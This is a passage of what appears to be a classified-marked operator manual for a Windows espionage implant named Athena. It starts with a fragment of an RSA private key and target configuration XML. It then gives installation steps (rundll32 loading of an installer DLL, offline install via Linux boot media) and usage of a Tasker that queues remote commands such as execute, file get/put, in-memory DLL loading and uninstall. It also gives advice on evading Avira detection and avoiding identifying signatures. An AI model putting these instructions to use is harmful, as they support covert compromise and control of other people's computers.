rFuEbf7lUu17LBm5T2kj6YFHQDu2VSLJ2VoQwDkHEOCCefoMmX3Zf6Ys5CExF7y/
2I4gjblm/swYXY0Tz/SoVaDWZhwmVZZdfSvWkbZuv1LJHeyNOukCggEBAPHWXFmE
y+R4I5A0WnRI5dm84cpERUWz4S2aLhSX2YzZ/TapwRgk1t8gWjLKejD0BhGFweQQ
tcWlpCu9xOUnBuO/nezFJTM8pQMxmrIWKtL8/sFqaascfp5ohFh45AjFPLhuhusI
+80lhj7mBOohFVxuHrNjXO2ag1EQPgndEe8Ye/2/bZJ0cpVlACJ5mwP6myj94LAl
ZKUZfz7nr44tsXiA1ejEWuAMn3RF8gNkeBsrRKJsNvc4t7rCSIDAXUxsNv/7q3Tk
p/3I8hqGQ8qSX9mSXdL00uRckcTVHN5bDbp3q5nA7qRFIWG2K0XSwjnr7f8F4fo9
za53Oq+Ket42dJMCggEBAO2JRjz/WjqNFVfSxE5nGsLBcnwVuumy2O1rAsYVqKUB
Q/dAC7elK5x4m3H2v3aIHZ+i+KYETnAjPJNtPEu/i6CXJh2g3I8UBb3s/EGtpZ3n
dev8cPXLkvr4Pj9KE3LIAoehgXPMzHs+o+mYIs9dUD3TGqJONawqPaNRn5da76qh
l4pExR2lFwNd6eOrXGGhwp5kkH39/ASE88z6YbtpSLDjhg9wsj0Eo0V1nUdzPMZj
6UYPeBPtJrxbE2CtokgYgeUo89WuWDoM2t2L9E/YACsQuEN/pszCr/RkQDKDIPpi
hmkyiD1xjGofHmZXzq1yfyh8ucM5wGu3BVxJWYVBFvUCggEBAOSOhQUNnm00pde5
wus3ohOgkXxJ/XYcxOoGVxqbUL3vn4Iz+QxKdNC3kMeD2Ou/FKUm1tImgMRlAb1d
QmKX+cjw5d5JjBjabdGQ5fT9QkfZVyOQ4IEZEwm/GaVLy6gGUJa1zsj+2otNtYxo
c6iaz8dlQ5qig8cDSqwoP5mu1y4y46wzaOkLKOfMZs4uQ7UE+fNJzTpsfKwUZtAa
wy4KPTn3+TJdsM0i4OhQ2qMeJuz2fY1L3L7VWb8lssQMCaEafPh879Qv7hzJ9xXe
Yt9mazQDQq0HOPEeE54FE52KTHU4eHN9hYy20Q+5zTfWMj3vniRxeNq54lPK1ynk
JK8ypAUCggEBAMo3QwRKnpWZ5cGOPHBCdhW2ebAJD8ZD60izAPmBFsDiAupKK697
fVUHl829MeHGnvF33BX5NI1icf9PzzTtLADarCgs+ZcUhI7bYSTIn2V91nW/wqp9
U/Mzwko+1a+xdfXhGENs5edFvGTwjzHZTqZTQSlLS4X1r+OJaUOAtuecCVY8lVJX
aPAE00huaYb0HqqZEikwP4vZY3Ps86aISsnL6CTc29/2QsivB+X7xJFgHQb3xFGy
YneXUTfMmYqm0m40HuCaO6Gvr+NLcgFG8V24LiXIVkeathBoB/74guqlVafYzQMB
13fAZjDaL6iZAIeHJt18HMOWW4nlJ8C5WMECggEBALHobKlHKQgBjnhc8VU1d7fT
SECRET//NOFORN 21
SECRET//NOFORN
________________________________________________________________________
9KQOrFATxmyIt0kXbWXQ1yNmRKnybXAWHleAzCj0qrKf7CtdRSPOB7WetwTH5ork
7FYwjPTWEr+hsDZmKXOuU3XvlCByNbKe7M2CilseCcqpzhmQDghH3lIAp+BTkwYL
zD5Z5IakrmXE+NmRafPUUZnEhmi1yNuinPeTlrULBbh3X6W9mvJQcOSFZ4HkaE5W
nFVG1GYYAISzBqgk4aALrupQGzshdQgvEcfOeEZuYUxRaqeQGvZS7z/cDQ/10Z7J
3NN4NMOj7VGMNj/tcW5ScEba5ZbZwnPZWiDChHTblOpkbnLKhb/o1898RFaEryg=
-----END RSA PRIVATE KEY-----
</PRIVATE_KEY>
</SERVER_KEY>
<SOURCE>
<MASK>4D324A24C2EB88548A760390ED9DEAB6</MASK>
</SOURCE>
<TARGET>
<CHILD_ID>0xABCD0064</CHILD_ID>
<DYN_CONFIG_TYPE>0</DYN_CONFIG_TYPE>
<PARENT_ID>test</PARENT_ID>
</TARGET>
</ATHENA>
SECRET//NOFORN 22
SECRET//NOFORN
________________________________________________________________________
7. (U) Implant Installation
7.1 (U) Overt Installation on Disk Mode
(S//NF) Once the target is created with the Builder, the implant can be installed with the Installer
DLL. The specific name can be changed when deploying using a DLL file.
Installer_x64.dll 64 bit installation DLL
Installer_x86.dll 32 bit installation DLL
(S//NF) Another tool is required to load the Installer onto the system. For testing
purposes only, rundll32.exe (with Administrator access) can be used as the loader tool.
However, testing the Installer using rundll32.exe may be flagged by the PSP (see
discussion in Section 10.2).
Usage: rundll32 installer_x64.dll,#2
Note
(S//NF) The Shellterm entry point is at ordinal 1 and the
rundll32 entry point is at ordinal 2.
SECRET//NOFORN 23
SECRET//NOFORN
________________________________________________________________________
>offline_x64.exe
OFFLINE::Dec 21 2015
USAGE: offline <optional windows path>
Searching C:
Searching D:
Searching X:
Update options:
1) C:\Windows (x64)
2) D:\Window10 (x64)
SECRET//NOFORN 24
SECRET//NOFORN
________________________________________________________________________
Table 8 - (S//NF) Required Offline Installer Components
Component Version
Utility
bash 4.3.8 or greater
sed 4.2.2
od 8.2.1 or greater
reged.static 0.1 140201(included in the Athena distribution)
fdisk 2.20.1 or greater
mawk 1.3.3 or greater
grep 2.16-1 or greater
mount 2.20.1-5 or greater
file 1.5.14 or greater
(S//NF) Begin the Linux based offline installation by booting the target with a Linux boot disk
(i.e. Ubuntu installation media). Insert or download the Athena/Hera media. The Athena/Hera
Media should contain two shell scripts (linux.sh, functions.sh) and an INI configuration file
(usually target.ini). Configuration parameters for the target are pulled from the INI file.
(S//NF) Run ./linux.sh <target.ini>. You will be prompted to select any available target windows
partitions. Select the corresponding number as shown in Figure 15. Once you select the
partition, the Windows architecture will be determined via a file utility call and the appropriate
binaries will be deployed. Once installation is successful, restart the target machine.
8. (U) Tasker
(S//NF) Some general usage comments are presented below:
Any default value (e.g., [bracketed text]) is either randomly generated or a suggestion, and
their use on multiple operations without modification may present a signature that could
identify the presence of Athena in a network.
SECRET//NOFORN 25
SECRET//NOFORN
________________________________________________________________________
The word 'overt' in a prompt for configuration information indicates the information will be
visible to a user logged on to the target machine. Care should be taken to ensure these values
are consistent with the operational CONOP.
Configuration settings that can be modified when the implant is on target are indicated in the
prompt text.
(S//NF) By default, the Tasker allows the Operator to interactively build tasking for an implant
or implant family. Alternatively, the operator can also input tasking via a scripted tasking file.
>python.exe tasker.py -h
usage: tasker.py [-h] [-r RECEIPT] [-s SCRIPT] [-g GENERATE] [-p PRIORITY]
[-x] [-e] [--id ID] [--debug]
Tasker Configuration
optional arguments:
-h, --help show this help message and exit
-r RECEIPT, --receipt RECEIPT
This argument defines an existing receipt filename to
be used for processing.
-i SCRIPT, --import SCRIPT
This argument provides the ability to import a script
for processing.
-g GENERATE, --generate GENERATE
This argument provides the output path location.
-p PRIORITY, --priority PRIORITY
This argument provides ability to set the
priority/ordering (0..255) NOTE: 128->default and
0->highest.
-x, --persist This argument provides ability to set the batch as a
persistent batch.
-e, --stoponerror This argument provides ability to stop the batch on a
command execution error.
--id ID This argument provides the ability to force a specific
initial task ID for a tasking session (usually just
used for debugging purposes - number is decoded as
hex).
--debug This argument allows debugging information to be
included in the output directory.
SECRET//NOFORN 26
SECRET//NOFORN
________________________________________________________________________
Usage: python.exe tasker.py
8.2.7 (U) ID
(S//NF) This argument provides the ability to force a specific initial task ID for a tasking
session (usually just used for debugging purposes - number is decoded as hex).
SECRET//NOFORN 27
SECRET//NOFORN
________________________________________________________________________
8.3 (U) User Interface
(S//NF) The Tasker shell interface allows for an interactive processing mode. There are two
input options. By simply selecting a management feature or command feature and pressing
enter, a wizard interface will be presented to select all required options for the feature.
Alternatively, for more advanced users, a command line option with tab-complete can be used to
process commands on a single line. The formatting of the command features is identical to the
script output format.
Management Features
============================================================
receipt generate ls rm import id help
Command Features
============================================================
execute get put memload memunload set delete uninstall
Exit Commands:
============================================================
bye exit
Output:
New Receipt Loaded:
Receipt File: builder_output\test_ABCD0064\test_ABCD0064.receipt.xml
Parent ID: test
SECRET//NOFORN 28
SECRET//NOFORN
________________________________________________________________________
o during a beacon cycle. This has lower priority than other batch commands
o waiting for processing.
Stop On Error (bool): true-do not continue processing batch on command failure
o false-continue processing all batch command irrelevant of error status
Output Path: location where the batch information is stored (default: .\tasker_output)
Usage: generate priority=128 persist=false stoponerror=false output=.\tasker\output
Example: generate
[generate] - output binary batch file for a specific target
Description: prioritize this batch request on LP (0-high, 255-low)
Default: 128
priority (number 0..255):
Description: persist this batch on LP - do not delete after transfer
Default: False
persist (bool):
Description: Stop executing this batch on a command error
Default: False
stoponerror (bool):
Description: specific path to store batch (binary file and script)
Default: tasker_output
output path (string):
PATH: d:\Development\Athena\console\tasker\tasker_output\test
RSA encrypting header with client public key
BINARY: __128_test_ABCD0064_63A95A3C
SCRIPT: __128_test_ABCD0064_63A95A3C_script.txt
BATCH: 63A95A3C
0: execute pre=0 post=0 filename="ipconfig" arguments="/all"
1: uninstall pre=0
SECRET//NOFORN 29
SECRET//NOFORN
________________________________________________________________________
Receipt File: builder_output\test_ABCD0064\test_ABCD0064.receipt.xml
Parent ID: test
8.3.1.3 (U) LS
(S//NF) This command will list the batch id and all commands defined for this batch. They are
numbered from zero and can be referenced by this index.
Usage: ls
Example: ls
Output:
BATCH: DAD72903
0: execute pre=0 post=0 filename="ipconfig" arguments="/all"
1: uninstall pre=0
8.3.1.4 (U) RM
(S//NF) This command will remove a command from the current batch. Each command is
reference by a zero based index. These indexes can be viewed by using the LS command as
shown above. The remove command will remove a single command from a batch.
Usage: rm <index>
Example: rm 1
Output:
REMOVED: uninstall pre=0
8.3.1.6 (U) ID
(S//NF) The ID command is used to force a specific batch ID for the Tasker to generate. This
command is generally used for debug purposes only.
Usage: id <hex>
SECRET//NOFORN 30
SECRET//NOFORN
________________________________________________________________________
Example: id 12345678
Output:
New Batch ID=0x12345678
SECRET//NOFORN 31
SECRET//NOFORN
________________________________________________________________________
Output:
COMMAND: get flag=0 filename="c:\temp\myfile.txt"
SECRET//NOFORN 32
SECRET//NOFORN
________________________________________________________________________
8.3.2.5 (U) Memunload
(S//NF) This command will unload a loaded module based on the nickname provided in the
memload command. WARNING: The nickname is case sensitive.
Usage: memunload pre=0 nickname=<string>
Example:
[memunload] - unload a DLL already loaded on target
Description: amount of time prior to command processing (0-default)
pre-delay (number):
Description: specific nickname used during memload
nickname (string):mymodule
Output:
COMMAND: memunload pre=0 nickname="mymodule"
SECRET//NOFORN 33
SECRET//NOFORN
________________________________________________________________________
Description: specific name of configuration
name:interval
Description: specific value for the configuration
value (number):20000
Output:
COMMAND: set pre=0 post=0 interval=20000
Management Features
============================================================
receipt generate ls rm import id help
Command Features
============================================================
execute get put memload memunload set delete uninstall
Exit Commands:
============================================================
bye exit
SECRET//NOFORN 34
SECRET//NOFORN
________________________________________________________________________
tasker::no receipt>receipt builder_output\e0Eo\receipt.xml
New Receipt Loaded:
Receipt File: builder_output\e0Eo\receipt.xml
Parent ID: e0Eo
tasker::e0Eo>execute
[execute] - execute a command on target
Description: amount of time prior to command processing (0-default)
pre-delay (number):
Description: amount of time after command processing completes (0-default)
post-delay (number):
Description: specific application name on target to execute
filename (string):ipconfig
Description: specific arguments used with this command
arguments (string):/all
COMMAND: execute pre=0 post=0 filename="ipconfig" arguments="/all"
Figure 18 - (S//NF) Tasker Shell Interface Example Part 1
OR
>python.exe tasker.py
Management Features
============================================================
receipt generate ls rm import id help
Command Features
============================================================
execute get put memload memunload set delete uninstall
Exit Commands:
============================================================
bye exit
tasker::e0Eo>generate
[generate] - output binary batch file for a specific target
Description: prioritize this batch request on LP (0-low, 255-high)
Default: 128
priority (number 0..255):
Description: persist this batch on LP - do not delete after transfer
Default: False
persist (bool):
Description: Stop executing this batch on a command error
Default: False
stoponerror (bool):
Description: specific path to store batch (binary file and script)
Default: tasker_output
output path (string):
PATH: d:\Development\Athena\athena_suite\tasker_output\e0Eo
RSA encrypting header with client public key
BINARY: __128_e0Eo_1111
SCRIPT: __128_e0Eo_1111_script.txt
BATCH: 00001111
0: execute pre=0 post=0 filename="ipconfig" arguments="/all"
Figure 19 - (S//NF) Tasker Shell Interface Example Part 2
SECRET//NOFORN 35
SECRET//NOFORN
________________________________________________________________________
8.5 (U) Output
(S//NF) The Tasker produces a binary file (no extension) and a text file (.txt). The binary file
will be copied to the Listening Post for downloading to the target. The text file is an
unencrypted textual reference of the commands within the specific batch file which can be used
as an historical reference or as an input to the Tasker to generate a duplicate batch.
+ The plus sign tells the server that this file is persistent and the server will not delete it after
processing (e.g. +_128).
Priority number This number represents the priority. 0-highest and 255-lowest (NOTE: 128-default)
Parent string This string represents the target parent ID. This name must match the parent ID reference
in the directory.
Child hex This string representation of hex is the target child ID. This name must match the child
ID reference in the directory.
Batch hex This string representation of hex is the batch ID. This is a random number which prevents
duplicate batches.
9. (U) Parser
(S//NF) Some general usage comments are presented below:
Any default value (e.g., [bracketed text]) is either randomly generated or a suggestion, and
their use on multiple operations without modification may present a signature that could
identify the presence of Athena in a network.
SECRET//NOFORN 36
SECRET//NOFORN
________________________________________________________________________
The word 'overt' in a prompt for configuration information indicates the information will be
visible to a user logged on to the target machine. Care should be taken to ensure these values
are consistent with the operational CONOP.
Configuration settings that can be modified when the implant is on target are indicated in the
prompt text.
(S//NF) By default, the Parser will use the local directory for input and output directory
locations. A single receipt file or directory of receipt files can be included as a command line
option. By default, the builder_output\receipts directory will be used to process receipts built
with the Builder.
Parser Tool
usage: parser.py [-h] [-r RECEIPT] [-i INPUT] [-d] [-o OUTPUT] [-m]
Parser Configuration
optional arguments:
-h, --help show this help message and exit
-r RECEIPT, --receipt RECEIPT
This argument defines an existing receipt filename or
directory of receipts to be used for processing.
-i INPUT, --input INPUT
This argument provides the ability to import a file
or directory of files.
-d, --debug Enable decoding of unencrypted files from target
-o OUTPUT, --output OUTPUT
This argument provides the output path location.
-m, --nomark This argument provides the ability to reuse a
processed directory. By default, the parsing code
will mark processed files with a date prefix. (e.g.
20150908_1010_{30996559-C169-490B-A40B-4ADB597E0D19}.
SECRET//NOFORN 37
SECRET//NOFORN
________________________________________________________________________
9.2.2 (U) INPUT
(S//NF) This argument provides the ability to import a file or directory of files into the Parser.
By default, the Parser will search the parser_input directory for files that are not marked.
SECRET//NOFORN 38
SECRET//NOFORN
________________________________________________________________________
Modify Time: Mon Dec 21 22:08:02 2015 GMT
Create Time: Mon Dec 21 22:08:02 2015 GMT
File Size: 18 bytes
Output Filename:
d:\Development\Athena\Tests\TestCommandEngine\parser_output\test\ABCD0086\responses\20
151221_17_10_01_0375_get.bin
SECRET//NOFORN 39
SECRET//NOFORN
________________________________________________________________________
9.4.4 (U) Memload
(S//NF) An example of the Parser output from a successful Memload command is shown below:
Batch ID = 0x55555555
Command ID = 0x00000000
Command Type = memload
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:09:07 2015 GMT
Memory Address = 0x10000000
Nickname = testdll nickname
SECRET//NOFORN 40
SECRET//NOFORN
________________________________________________________________________
Batch ID = 0x44444444
Command ID = 0x00000001
Command Type = execute
Command Status = 0x00000000
Error Code = 0x00000000
Persist = False
Stop On Error = False
Parent ID = test
Target ID = ABCD0086
Time = Mon Dec 21 22:09:02 2015 GMT
Filename = %systemroot%\system32\net.exe
Process Return Code = 0x00000000
<<STDIN/OUT/ERROR>>
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
Unavailable Z: \\10.3.2.91\Athena Microsoft Windows Network
The command completed successfully.
SECRET//NOFORN 41
SECRET//NOFORN
________________________________________________________________________
0xA0000102 Size too big
0xA0000103 Out of memory
0xA0000104 Disk Error invalid disk name or ram only
10.2 (U) Installer and RAM_ONLY Versions Should Never Be Run From Disk
(S//NF) Copying the Installer or the RAM_ONLY version of the implant to the target computer
and then executing either application from disk will generate an alert when Avira is the PSP.
Avira flags the size of the data section as being too large and thus possibly malware. Avira does
not flag the size of the implant data section when these applications are run from memory as
intended.
10.3 (U) Builder Does Not Produce a Bit Copy of an Existing Configured
Implant
(S//NF) The Builder can ingest a configuration file from an existing implant and copy the
configuration settings to a new implant. However, the new implant will not be a bit by bit exact
copy of the original implant. Making an exact copy of an existing implant is not possible due to
the design of the implant and the desire to ensure entropy in between instances of the tool. Only
way to reproduce a bit copy of an existing implant would be to have a large section of zero byte
data in the configured implant which would be an easy way to correlate instances of the tool.
SECRET//NOFORN 42
SECRET//NOFORN
________________________________________________________________________
to complete transferring the entire file to the LP before the duration timer expires when the file is
very large. Care should be taken to select values consistent with the operational environment
when configuring the chunk size (maximum number of bytes in a single block), command
execution timeout (terminates processing of long running commands), and batch execution
timeout (terminates processing of long running batches). A good operational practice would be
to assign reasonable values for these settings early in the batch when a large file is being
retrieved.
SECRET//NOFORN 43